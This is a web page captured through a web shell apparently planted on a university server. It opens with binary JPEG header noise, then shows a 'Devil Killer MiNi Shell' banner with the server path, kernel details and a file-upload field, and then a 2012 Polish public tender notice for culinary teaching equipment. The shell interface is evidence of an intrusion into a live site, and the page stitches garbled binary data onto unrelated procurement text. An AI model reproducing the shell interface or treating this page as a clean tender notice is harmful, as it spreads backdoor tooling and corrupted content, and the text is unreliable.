JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120828/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120828/318966-N-2012.html

<p class="kh_header"><b>Olsztyn: Dostawa wyposażenia, pomocy oraz drobnego sprzętu do prowadzenia zajęć praktycznych z zakresu sztuki kulinarnej w ramach projektu Wzmocnienie potencjału dydaktycznego UWM w Olsztynie finansowanego ze środków Unii Europejskiej w ramach Priorytetu IV Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 realizowanego przez Uniwersytet Warmińsko-Mazurski w Olsztynie nr umowy UDA-POKL.04.01.01-00-095/10-00.</b><br>
<b>Numer ogłoszenia: 318966 - 2012; data zamieszczenia: 28.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie , ul. Oczapowskiego 2, 10-719 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5233420, faks (089) 5233278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> uwm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia, pomocy oraz drobnego sprzętu do prowadzenia zajęć praktycznych z zakresu sztuki kulinarnej w ramach projektu Wzmocnienie potencjału dydaktycznego UWM w Olsztynie finansowanego ze środków Unii Europejskiej w ramach Priorytetu IV Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 realizowanego przez Uniwersytet Warmińsko-Mazurski w Olsztynie nr umowy UDA-POKL.04.01.01-00-095/10-00..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego postępowania jest dostawa wyposażenia, pomocy oraz drobnego sprzętu do prowadzenia zajęć praktycznych z zakresu sztuki kulinarnej w ramach projektu Wzmocnienie potencjału dydaktycznego UWM w Olsztynie finansowanego ze środków Unii Europejskiej w ramach Priorytetu IV Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 realizowanego przez Uniwersytet Warmińsko-Mazurski w Olsztynie nr umowy UDA-POKL.04.01.01-00-095/10-00.
2.	Przedmiot zamówienia został podzielony na 2 części.
3.	Szczegółowy opis przedmiotu zamówienia zawarty został w Załączniku nr 2 do SIWZ.
4.	W przypadku wskazania w opisie przedmiotu zamówienia nazw własnych, patentów, pochodzenia lub wskazania parametrów technicznych wskazujących na produkt konkretnego producenta Zamawiający zgodnie z treścią art. 29 ust. 3 ustawy Prawo zamówień publicznych dopuszcza możliwość składania ofert równoważnych wg parametrów technicznych i cech jakościowych opisanych szczegółowo w Załączniku nr 2 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.00.00.00-6, 39.20.00.00-4, 39.70.00.00-9, 39.13.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu
oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu
oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu
oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu
oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu
oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą
podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego - w oryginale
lub poświadczone notarialnie lub opatrzone adnotacją za zgodność z oryginałem pieczęcią
Wykonawcy, imienną pieczątką osoby upoważniającej na podstawie dokumentu rejestrowego
oraz jej podpisem. 2. Formularz ofertowy sporządzony przez Wykonawcę według wzoru
stanowiącego Załącznik nr 1 do Specyfikacji Istotnych Warunków Zamówienia. 3. Formularz
cenowy sporządzony przez Wykonawcę według wzoru stanowiącego Załącznik nr 2 do
Specyfikacji Istotnych Warunków Zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje w ramach zawartej umowy zmiany dotyczące: - zmiany terminu
realizacji umowy, ze względu na wystąpienie okoliczności nie dających się przewidzieć przed
zawarciem umowy, np. działanie siły wyższej, - zmiany terminu realizacji umowy, ze
względu na wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć,
pomimo zachowania należytej staranności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uwm.edu.pl/zamowienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet
Warmińsko - Mazurski w Olsztynie, Dział Zamówień Publicznych, pok. 310, ul.
Oczapowskiego 2, 10-719 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2012 godzina 10:00, miejsce: Uniwersytet Warmińsko - Mazurski w Olsztynie,
Dział Zamówień Publicznych, pok. 309, ul. Oczapowskiego 2, 10-719 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu Wzmocnienie
potencjału dydaktycznego UWM w Olsztynie finansowanego ze środków Unii Europejskiej w
ramach Priorytetu IV Programu Operacyjnego Kapitał Ludzki na lata 2007-2013
realizowanego przez Uniwersytet Warmiński-Mazurski w Olsztynie (Nr umowy UDAPOKL.
04.01.01-00-095/10-00).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wyposażenie do prowadzenia zajęć praktycznych z zakresu sztuki kulinarnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Piec konwekcyjno-parowy z wyposażeniem, podstawą oraz zmiękczaczem wody

1.	Piec konwekcyjno-parowy: 	- 1 sztuka
a)	Pojemność: 7 x GN 2/3
b)	Mycie automatyczne za pomocą proszku
c)	Program odkamieniania za pomocą proszku odkamieniającego 
d)	Funkcja pokazująca zużycie energii w Kw
e)	Menu w języku polskim 
f)	System serwisowo diagnostyczny w języku polskim
g)	Licznik przepracowanych godzin
h)	Powiadomienie o okresowym przeglądzie w języku polskim
i)	Skrócona instrukcja obsługi w języku polskim wyświetlana na wyświetlaczu LCD
j)	System rozpoznający ilość włożonej potrawy do pieca oraz wybór efektu końcowego
k)	Wymiary (szer. x wys. x gł.): 683 x 575 x 644 mm, +/- 20 mm
l)	Higieniczna komora z zaokrąglonymi rogami
m)	Podwójna szyba drzwi
n)	Dwustopniowe otwieranie drzwi
o)	Automatyczne mycie i 4-punktowa sonda termiczna
p)	Obustronne obroty wentylatora do równomiernego pieczenia
q)	Podstawa ze stali nierdzewnej z prowadnicami na pojemniki GN	
					
2.	Podstawa pod piec GN 2/3 ze stali nierdzewnej. - 1 sztuka
Kompatybilna z piecem wyspecyfikowanym w pkt. 1 		
				
3.	Zmiękczacz automatyczny do wody - 1 sztuka
a)	Zmiękczanie wody w ekspresach, zmywarkach i piecach konwekcyjno-parowych 
b)	Regeneracja za pomocą soli niejodowanej tabletkowanej
c)	Regeneracja odbywa się automatycznie w zaprogramowane dni o ustawionej godzinie 
d)	Pojemnik na 10 kg soli	
					
4.	Pojemnik gastronomiczny GN 2/3 perforowany - 2 sztuki
a)	Wymiary: 35,2 x 32,5 x 2 cm
b)	Możliwość stosowania w wysokich temperaturach od -20oC do 300oC
c)	Wykonany ze stali nierdzewnej o grubości 0,8 mm
d)	Perforowany - pełna perforacja również narożników
e)	Wzmocnione krawędzie
f)	Możliwość stosowania pokryw ze stali nierdzewnej	
				
5.	Pojemnik gastronomiczny GN 2/3 perforowany - 2 sztuki
a)	Wymiary: 35,2 x 32,5 x 4 cm
b)	Możliwość stosowania w wysokich temperaturach od -20oC do 300oC
c)	Wykonany ze stali nierdzewnej o grubości 0,8 mm
d)	Perforowany - pełna perforacja również narożników 
e)	Wzmocnione krawędzie
f)	Możliwość stosowania pokryw ze tali nierdzewnej 	
		
6.	Pojemnik gastronomiczny GN 2/3 - 4 sztuki
a)	Wymiary: 35,2 x 32,5 x 2 cm 
b)	Pojemność: 1,4 l
c)	Możliwość stosowania w wysokich temperaturach od -20oC do 300oC
d)	Wykonany ze stali nierdzewnej o grubości 0,8 mm
e)	Wzmocnione krawędzie
f)	Możliwość stosowania pokryw ze stali nierdzewnej 	
					
7.	Pojemnik gastronomiczny GN 2/3 - 2 sztuki
a)	Wymiary: 35,2 x 32,5 x 4 cm 
b)	Pojemność: 3,2 l
c)	Możliwość stosowania w wysokich temperaturach od -20oC do 300oC
d)	Wykonany ze stali nierdzewnej o grubości 0,8 mm
e)	Wzmocnione krawędzie 
f)	Możliwość stosowania pokryw ze stali nierdzewnej 	
				
8.	Pojemnik gastronomiczny GN 2/3 - 2 sztuki
a)	Wymiary: 35,2 x 32,5 x 6,5 cm 
b)	Pojemność: 5,8 l
c)	Możliwość stosowania wysokich temperaturach od -20oC do 300oC
d)	Wykonany ze stali nierdzewnej o grubości 0,8 mm
e)	Wzmocnione krawędzie 
f)	Możliwość stosowania pokryw ze stali nierdzewnej 	
					
9.	Pokrywa z uszczelką silikonową - 1 sztuka
a)	Wymiary: 35,2 x 32,5 cm
b)	Możliwość stosowania w wysokich temperaturach od -20oC do 300oC
c)	Wykonana ze stali nierdzewnej o grubości 0,8 mm	
				
10.	Ruszt płaski - 2 sztuki
a)	Wymiary: 35,2 x 32,5 x 0,5 cm
b)	Możliwość stosowania w wysokich temperaturach od -20oC do 300oC
c)	Sztywny ruszt wykonany ze stali nierdzewnej o średnicy 6 mm						

II. Piec piekarniczo-cukierniczy z wyposażeniem, garownikiem oraz zmiękczaczem wody

11.	Piec piekarniczo-cukierniczy - 1 sztuka
a)	Pojemność: 5 x 400/ 600 mm
b)	Sterowanie garownika w piecu
c)	Obroty wentylatora dwustronne
d)	Możliwość wytwarzania pary przy funkcji gorącego powietrza 
e)	12 programów z odrębnymi przyciskami 
f)	3-stopniowa regulacja intensywności nawilżania komory
g)	System intensywnego nawilżania 
h)	Higieniczna komora pieczenia z zaokrąglonymi wewnętrznymi rogami		
				
12.	Garownik - 1 sztuka
a)	kompatybilny z piecem wyspecyfikowanym w pkt. 11
b)	Garownik do rozrostu ciasta 
c)	Możliwość podglądu garowanych produktów poprzez dwuskrzydłowe szklane drzwi		
			
13.	Zmiękczacz automatyczny do wody - 1 sztuka
a)	Zmiękczanie wody w ekspresach, zmywarkach i piecach konwekcyjno-parowych 
b)	Regeneracja za pomocą soli niejodowanej tabletkowanej
c)	Regeneracja odbywa się automatycznie w zaprogramowane dni o ustawionej godzinie
d)	 Pojemnik na 10 kg soli		
			
14.	Blacha cukiernicza emaliowana - 4 sztuki
a)	Wymiary: 40 x 60 x 1,2 cm					
	
15.	Blacha cukiernicza emaliowana - 2 sztuki
a)	Wymiary: 40 x 60 x 4 cm		
		
16.	Stalowa blacha do pieczenia - 2 sztuki
a)	Ukośne krawędzie 
b)	Czarna stal
c)	Wysokie przewodnictwo ciepła 
d)	Powierzchnia blachy musi posiadać mikroskopijne nierówności, które utworzą warstwę powietrza między ciastem a blachą
e)	Bardzo mocna - nie ulega zniekształceniom
f)	Długość: 60 cm
g)	Szerokość: 40 cm
h)	Wysokość: 1 cm 		
			
17.	Profesjonalny ruszt cukierniczy ze stali nierdzewnej - 2 sztuki
a)	Rama i pręty środkowe o średnicy 5 mm
b)	Długość: 60 cm
c)	Szerokość: 40 cm			
		
18.	Forma oksydowana do wypieku pizzy - 4 sztuki
a)	Wykonana z blachy o grubości 0,6 mm
b)	Wymiary:
-	Średnica: 28 cm
-	Wysokość: 2,5 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.00.00.00-6, 39.20.00.00-4, 39.70.00.00-9, 39.13.70.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pomoce i drobny sprzęt do prowadzenia zajęć z zakresu sztuki kulinarnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Garnek satynowy z pokrywką, ze stali nierdzewnej, wielowarstwowe dno - 1 sztuka
a)	Śr.: 200 mm
b)	Wys.: 200 mm
c)	Pojemność: 6,3 l

2.	Garnek satynowy z pokrywką, ze stali nierdzewnej, wielowarstwowe dno - 1 sztuka
a)	Śr.: 240 mm
b)	Wys.: 110 mm
c)	Pojemność: 5 l

3.	Garnek satynowy z pokrywką, ze stali nierdzewnej, wielowarstwowe dno - 3 sztuki
a)	Śr.: 240 mm
b)	Wys.: 110 mm
c)	Pojemność: 3,3 l

4.	Garnek satynowy z pokrywką, ze stali nierdzewnej, wielowarstwowe dno - rondel - 2 sztuki
a)	Śr.: 160 mm
b)	Wys.: 95 mm
c)	Pojemność: 1,9 l

5.	Rondel do sosów satynowy z pokrywką, ze stali nierdzewnej, wielowarstwowe dno - 4 sztuki
a)	Śr.: 240 mm
b)	Wys.: 65 mm
c)	Pojemność: 1,2 l

6.	Patelnia aluminiowa do naleśników - 4 sztuki
a)	Zapobiegająca przywieraniu i odporna na zarysowania
b)	3-warstwowa powłoka teflonowa lub równoważna 
c)	Można smażyć z niewielką ilością tłuszczu
d)	Epoksydowane stalowe rączki o wysokiej wytrzymałości termicznej
e)	Śr.: 254/220
f)	Wys.: 17 mm

7.	Patelnia trójwarstwowa z wysokopolerowanej stali nierdzewnej, z pokrywką - 4 sztuki
a)	wymiary patelni: 
-	śr.: 240 mm
-	wys.: 50 mm
b)	wymiary pokrywki:
-	śr.: 240 mm

8.	Patelnia żeliwna uniwersalna - 2 sztuki
a)	Oksydowana powierzchnia zapobiegająca rdzewieniu 
b)	Można używać w piekarnikach i piecach 
c)	Do bezpośredniego podawania na stół
d)	Rączka ze stali nierdzewnej
e)	Śr.: 280 mm
f)	Wys.: 50 mm
g)	Długość: 563 mm
h)	Masa: 3,1 kg

9.	Nóż kuchenny ze stali chromowo-molibdenowej - 8 sztuk
a)	Twardość: 54-56 HRC
b)	Można myć w zmywarce i wyparzać 
c)	Rękojeść ergonomiczna wykonana z polipropylenu 
d)	Długość: 210 mm

10.	Nóż do obierania ze stali chromowo-molibdenowej - 8 sztuk
a)	Twardość: 54-56 HRC
b)	Można myć w zmywarce i wyparzać
c)	Rękojeść ergonomiczna wykonana z polipropylenu
d)	Długość: 100 mm

11.	Obieraczka do warzyw - 8 sztuk
a)	Ostrze dwustronne ze stali nierdzewnej

12.	Tarka ze stali nierdzewnej - 4 sztuki
sześciokątna
a)	Wys.: 190 mm

13.	Dzbanek miarka ze stali nierdzewnej - 4 sztuki
a)	Podziałka wewnątrz dzbanka 
b)	Poj.: 0,5 l

14.	Dzbanek miarka ze stali nierdzewnej - 4 sztuki
a)	Podziałka wewnątrz dzbanka
b)	Poj.: 1,0 l

15.	Chochla monoblok standard - 4 sztuki
a)	Ze stali nierdzewnej 
b)	Śr.: 60 mm
c)	Poj.: 0,06 l

16.	Stolnica z bambusa - 8 sztuk
a)	Wymiary: 500 x 700 mm

17.	Talerz płytki biały typu ARCOROC - 18 sztuk
a)	Śr.: 270 mm

18.	Talerz deserowy biały typu ARCOROC - 30 sztuk
a)	Śr.: 195 mm

19.	Talerz płytki kwadratowy z białej porcelany - 6 sztuk
a)	Wzmocnione ranty
b)	Wytrzymała powłoka szklana
c)	Przystosowany do mycia w zmywarkach 
d)	Wymiary: 295 x 255 x 29 mm

20.	Pojemnik GN z białej porcelany - 6 sztuk
a)	Możliwość stosowania w temp. do 260oC
b)	Wymiary: 325 x 265 x 65 mm

21.	Patera do ciasta - 4 sztuki
a)	Ze stali nierdzewnej 
b)	Na podstawie 
c)	Śr.: 330 mm
d)	Wys.: 50 mm

22.	Worek do wyciskania z bawełny - do dekoracji ciast - 1 sztuka
a)	Dł.: 40 mm

23.	Worek do wyciskania z nylonu - do dekoracji ciast - 1 sztuka
a)	Dł.: 400 mm

24.	Końcówka do wyciskania stalowa - do dekoracji ciast - 2 sztuki
a)	Okrągła
b)	Śr.: 3 mm

25.	Końcówka do wyciskania stalowa - do dekoracji ciast - 2 sztuki
a)	Gwiazda
b)	Śr.: 5 mm

26.	Końcówka do wyciskania stalowa - do dekoracji ciast - 2 sztuki
a)	Róża
b)	Śr.: 6 mm

27.	Blender barowy z zapasowym dzbankiem - 1 zestaw
a)	Dwie prędkości 17 000/ 21 000 obr./min.
b)	Pojemnik 1,3 l z poliwęglanu w komplecie 
c)	Pokrywa  z otworem 
d)	Funkcja plus 
e)	Urządzenie nie przeznaczone do pracy ciągłej
f)	Wymiary: 180 x 2000 x 415 mm
g)	Moc: 0,38 Kw
h)	Dzbanek zapasowy do blendera z poliwęglanu - 1 sztuka

28.	Sokowirówka - 1 sztuka
a)	Liczba ustawień prędkości: 2
b)	Pojemność zbiornika na sok: 1,25 l
c)	Pojemność zbiornika na miąższ: 1 l
d)	Sitko ze stali nierdzewnej
e)	Zabezpieczenie przed włączeniem przy zdjętej pokrywie
f)	Stopki antypoślizgowe
g)	Kolor: inox
h)	Moc całkowita: 1000 W

29.	Waza do zupy z białej porcelany - 4 sztuki
a)	Poj.: 2,5 l
b)	Z pokrywą
c)	Wzmocnione ranty
d)	Wytrzymała powłoka szklana
e)	Przystosowana do mycia w zmywarkach
f)	Przystosowana do użytkowania w kuchence mikrofalowej

